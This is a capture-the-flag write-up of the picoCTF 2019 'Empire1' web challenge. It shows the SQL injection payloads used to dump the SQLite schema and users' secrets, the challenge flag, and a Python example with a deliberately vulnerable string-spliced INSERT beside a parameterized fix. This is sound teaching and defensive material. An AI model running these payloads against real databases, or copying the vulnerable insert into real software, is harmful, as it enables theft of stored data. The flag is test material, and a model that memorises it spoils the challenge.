Empire1
Point: 400
Category
Web Exploitation
Question
Psst, Agent 513, now that you're an employee of Evil Empire Co., try to get their secrets off the company website. https://2019shell1.picoctf.com/problem/37779/ (link) Can you first find the secret code they assigned to you? or http://2019shell1.picoctf.com:37779
Hint
Pay attention to the feedback you get
There is very limited filtering in place - this to stop you from breaking the challenge for yourself, not for you to bypass.
The database gets reverted every 2 hours if you do break it, just come back later
Solution
After registering and signing in, we see a nav bar with Add a Todo, Your Todos, Employee Listing. It doesn't seem to contain any vulnerability.
Trying to add something to TODO, we got this
We saw that the "Very Urgent:" prefix is automatically prepended to any text provided by the user.
After trying different strategies, I found that the page is vulnerable to SQL injection using the following syntax: '||(SQL)||'
The first time, I tried ' || (SELECT group_concat(sql) FROM sqlite_master) || ', then we got this
I saw secret VARCHAR(128), then I tried ' || (SELECT group_concat(secret) FROM user) || '. BOOM! Go to the Your Todos tab, and we get the flag: Very Urgent: Likes Oreos.,Know it all.,picoCTF{wh00t_it_a_sql_injecta4dfbd62}
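Why the '||(SQL)||' shape works, and the fix, as an added example (not the challenge's own code). The todo table, the INSERT statement and the sample secrets are assumptions constructed for illustration; only the user.secret column and the payload come from the writeup.

```python
import sqlite3

def make_db():
    # Constructed schema and rows; only user.secret is taken from the writeup.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE user (id INTEGER PRIMARY KEY, name TEXT, secret VARCHAR(128));
        CREATE TABLE todo (id INTEGER PRIMARY KEY, owner INTEGER, item TEXT);
        INSERT INTO user (name, secret) VALUES ('alice', 'constructed-secret-A');
        INSERT INTO user (name, secret) VALUES ('bob', 'constructed-secret-B');
    """)
    return db

def add_todo_vulnerable(db, owner, text):
    # Assumed server-side pattern: user text is spliced into the SQL string.
    # A quote ends the literal, and || (SQLite string concatenation) joins
    # the result of a subquery into the value that gets stored.
    db.execute("INSERT INTO todo (owner, item) VALUES (%d, 'Very Urgent: %s')"
               % (owner, text))

def add_todo_safe(db, owner, text):
    # Bound parameters: the text is passed as data and never parsed as SQL.
    db.execute("INSERT INTO todo (owner, item) VALUES (?, ?)",
               (owner, "Very Urgent: " + text))

def todos(db, owner):
    rows = db.execute("SELECT item FROM todo WHERE owner = ? ORDER BY id", (owner,))
    return [r[0] for r in rows]

# Payload exactly as given in the writeup.
PAYLOAD = "' || (SELECT group_concat(secret) FROM user) || '"

def demo():
    db = make_db()
    add_todo_vulnerable(db, 1, PAYLOAD)
    leaked = todos(db, 1)[0]      # subquery result ends up in the todo text
    db = make_db()
    add_todo_safe(db, 1, PAYLOAD)
    stored = todos(db, 1)[0]      # payload stored verbatim as plain text
    return leaked, stored

if __name__ == "__main__":
    for label, value in zip(("vulnerable", "parameterized"), demo()):
        print(label, "->", value)
```

With the parameterized insert the payload shows up in Your Todos as literal text, which is also a quick regression check after fixing this class of bug.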
Flag
picoCTF{wh00t_it_a_sql_injecta4dfbd62}